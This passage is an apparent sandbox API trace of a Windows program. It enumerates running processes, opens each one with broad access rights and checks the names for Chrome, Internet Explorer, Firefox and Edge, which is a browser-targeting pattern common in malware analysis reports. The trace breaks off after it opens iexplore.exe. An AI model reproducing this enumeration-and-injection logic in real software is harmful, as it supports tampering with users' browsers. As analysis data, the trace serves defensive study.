	[0237.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7c50
	[0237.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.896] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0237.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.896] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.896] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0237.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.897] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7c54
	[0237.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.898] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.898] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.899] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.899] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0237.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7c58
	[0237.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.900] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.902] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.902] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.902] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.903] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7c5c
	[0237.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.904] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.904] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.904] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.905] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.905] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.905] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7c60
	[0237.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.906] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.906] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.906] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.907] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.907] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7c64
	[0237.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.908] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.908] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.908] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.909] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0237.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7c68
	[0237.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.910] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0237.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.910] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.910] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0237.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.911] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0237.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7c6c
	[0237.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.912] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.912] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.912] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.913] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0237.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7c70
	[0237.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.914] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0237.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.914] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.914] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0237.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.915] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0237.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0237.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0237.918] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7c74
	[0237.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.918] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0237.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.918] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.919] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0237.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.920] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0237.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7c78
	[0237.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.921] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0237.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.921] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.922] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0237.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.922] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.922] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0237.923] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7c7c
	[0237.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.923] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0237.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.923] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.924] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0237.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.924] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0237.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7c80
	[0237.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.925] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0237.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.925] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.926] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0237.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.926] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0237.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7c84
	[0237.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.927] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0237.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.928] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.928] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0237.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.929] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0237.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7c88
	[0237.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.930] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0237.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.930] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.931] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0237.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.931] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.931] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0237.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7c8c
	[0237.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.933] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0237.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.933] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.934] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0237.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.934] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0237.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7c90
	[0237.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.936] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0237.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.936] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.937] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0237.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.938] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.938] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0237.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7c94
	[0237.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.940] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0237.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.940] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.940] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0237.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.941] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0237.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7c98
	[0237.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.942] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0237.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.943] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.943] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0237.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.943] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0237.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7c9c
	[0237.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.944] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0237.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.945] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.945] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0237.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.946] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0237.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7ca0
	[0237.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.947] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0237.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.948] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.949] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0237.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.950] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0237.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7ca4
	[0237.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.951] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0237.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.951] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.952] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0237.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.952] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0237.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7ca8
	[0237.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.954] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0237.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.955] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.956] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0237.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.957] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.957] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0237.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7cac
	[0237.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.958] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0237.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.959] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.959] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0237.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.960] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7cb0
	[0237.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
